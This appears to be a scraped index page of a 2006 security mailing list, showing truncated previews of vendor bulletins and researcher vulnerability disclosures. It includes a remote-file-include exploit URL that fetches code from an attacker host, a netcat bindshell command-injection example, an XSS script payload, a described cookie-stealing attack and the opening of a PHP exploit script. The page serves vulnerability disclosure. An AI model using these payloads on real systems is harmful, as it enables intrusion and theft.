-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00671912
Version: 1

HPSBMA02121 SSRT061157 rev.1 - HP OpenView Storage Data Protector Remote
Arbitrary Command Execution

NOTICE: The information in this Security Bulletin should be acted upon

[ more ]  [ reply ]

===========================================================
Ubuntu Security Notice USN-285-1 May 23, 2006
awstats vulnerability
CVE-2006-2237
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04 (Hoary Hedgehog)
Ubun

[ more ]  [ reply ]

DGbook v1.0 - XSS

Homepage:

http://www.diangemilang.com/dgscripts.php

Description:

This is Guestbook script, write on PHP from Dian Gemilang. Feature: Field validation, Limit character, Charecter filtering - This feature will remove "<" and ">" character, so user can't input HTML tag -, Auto

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00555516
Version: 5

HPSBUX02075 SSRT051074 rev.5 - HP-UX Running xterm Local Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon
as soon as possible.

Rel

[ more ]  [ reply ]

Alstrasoft Article Manager Pro v1.6 - XSS & Full Path errors

Homepage:

http://www.alstrasoft.com

Description:

Article Manager Pro is the next generation article publishing system designed to make your life a whole lot easier by enabling webmasters to publish articles or news into their websi

[ more ]  [ reply ]

AlstraSoft E-Friends - XSS

Homepage:

http://www.alstrasoft.com/

Description:

Alstrasoft E-friends allows you to run a community site like MySpace and Friendster.

Effected files or areas of site:

index.php

The input forms on the following items belowdo not properlly filter out a

[ more ]  [ reply ]

ENGLISH

# Title : phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities

# Dork : "powered by phpmydirectory"

# Author : ajann

# greetz : Nukedx,TheHacker

# Exploit;

### http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://your
host.com/cmd

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00659649
Version: 1

HPSBUX02114 SSRT061115 rev.1 - HP-UX Running Software Distributor Local
Elevation of Privilege

NOTICE: The information in this Security Bulletin should be acted upon
as soo

[ more ]  [ reply ]

#!/usr/bin/php -q -d short_open_tag=on

<?

echo "Nucleus <= 3.22 arbitrary remote inclusion exploit\r\n";

echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";

echo "site: http://retrogod.altervista.org\r\n\r\n";

echo "this is called the \"deadly eyes of Sun-tzu\"\r\n";

echo "dork: Copyright . Nucleus CMS v3.

[ more ]  [ reply ]

Non eXecutable Stack Lovin on OSX86
kf[at]digitalmunition[dot]com
05/18/06

After my obligatory Cinco De Mayo Corona hangover had passed, I decided it was time to score a little
Non eXecutable Mac Mini Hotness from my local Apple retailer. After ca

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

________________________________________________________________________

OpenPKG Security Advisory The OpenPKG Project
http://www.openpkg.org/security/ http://www.openpkg.org
openpkg-security (at) openpkg (dot) org [email concealed]

[ more ]  [ reply ]

Kaspersky antivirus 6

Kaspersky internet security 6

www.kaspersky.com

Vulnerable Systems: KAV6, KIS6

Detail:

The vulnerability is caused due to HTTP parsing errors in the HTTP monitor (Kaspersky Web-antivirus).

Any mailicious software on local computer can bypass HTTP virus monitor.

[ more ]  [ reply ]

SkyeShoutbox <= v.1.2.0 XSS

Discovered by: Nomenumbra

Date: 21/5/2006

impact:moderate (possible defacement)

SkyeShoutbox doesn't filter any input at all, thus

allowing attackers to inject arbitrary html or javascript.

Nomenumbra

[ more ]  [ reply ]

Russcom Ping Remote code execution

Discovered by: Nomenumbra

Date: 21/5/2006

impact:high (Remote code execution)

Russcom's Ping script allows attackers to execute

arbitrary code trough command piping after the ip (e.g 127.0.0.1 | nc -l -p 666 -e /bin/sh would grant a bindshell)

Nomenumb

[ more ]  [ reply ]

Russcom PHPImages lack of validation

Discovered by: Nomenumbra

Date: 21/5/2006

impact:moderate

Russcom's PHPImages doesn't validate if the uploaded

file is an image, it just checks for the extension, thus

allowing an attacker to upload php scripts with a .gif extension

for example, pote

[ more ]  [ reply ]

QBv14 XSS

Discovered by: Nomenumbra

Date: 21/5/2006

impact:moderate (possible defacement)

QBv14 doesn't filter anything at all, in short:

XSS heaven.....

Nomenumbra

[ more ]  [ reply ]

IpLogger <= 1.7 XSS

Discovered by: Nomenumbra

Date: 21/5/2006

impact:moderate (potential privilege escalation,possible defacement)

tjthedj's IpLogger (http://tjthedj.us/projects/iplogger/) suffers from XSS in a user's useragent.

It is possible to construct a useragent containing javascript,

[ more ]  [ reply ]

DSChat <= 1.0 XSS

Discovered by: Nomenumbra

Date: 21/5/2006

impact:moderate (possible defacement)

DSChat is a PHP-based chatscript which does no filtering

against XSS whatsoever, thus allowing anyone to insert

html or javascript in the chatbox.

Nomenumbra

[ more ]  [ reply ]

Chatty improper input sanitizing

Discovered by: Nomenumbra

Date: 21/5/2006

impact:moderate (possible defacement)

Chatty is a PHP-based chatscript allowing users to chat over the web.

Subscribing with a username like this: <script>alert(%22xss%22)</script>

would cause major xss in the chatr

[ more ]  [ reply ]

For those unfamiliar with MS quarantine control, you can read Jon Hassel's
tutorial on Windows 2003 Network Access Quarantine Control (NAQC)
[http://www.securityfocus.com/infocus/1794], and the ISA 2004 VPN Quarantine
(ISAQ) feature [http://www.securityfocus.com/infocus/1799].

A simplistic mecha

[ more ]  [ reply ]

Hackernetwork.Com Mail XSS Vulnerability

We use this method for steal mail adress.We use XSS (cross site scripting).
We will send this with xss code to someone and then if he or she open this
mail after that their cookies come to our log adress.
We use Proxomitron for login this mails and edit co

[ more ]  [ reply ]

Title:

Microsoft Internet Explorer - Crash on mouse button click

Author:

Kil13r - http://www.kil13r.info/

Local / Remote:

Both

Date of discovery:

2003/12/28

Release date:

2006/05/20

Affected software:

Microsoft Internet Explorer

Description:

There is a bug in Microsoft Inter

[ more ]  [ reply ]

http://bugs.php.net/bug.php?id=35429
I've written about that bug earlier, but php team didn't evaluate it as
a bug..

--
Kamil 'K3' Sienicki

[ more ]  [ reply ]

Hello Sanjay

There was no technical difficulty. That was just a POC
to proof the vulnerability and not to exploit it in
the wild. The choice at your disposal is limit less.
You can also debug the programe on windows 2003 server
and include the offsets. you can debug it on windows
2000 professional,

[ more ]  [ reply ]

I found a bug in artmedic Newsletter 4.1 (proably even in newer versions) which lets an attacker run arbitrary php-code and bypass the password protection.

The reason for this is mistake in design.

log.php:

<?php

$time = time();

$date = date("d.m.Y, H:i:s");

$remote = getenv("REMOTE_ADD

[ more ]  [ reply ]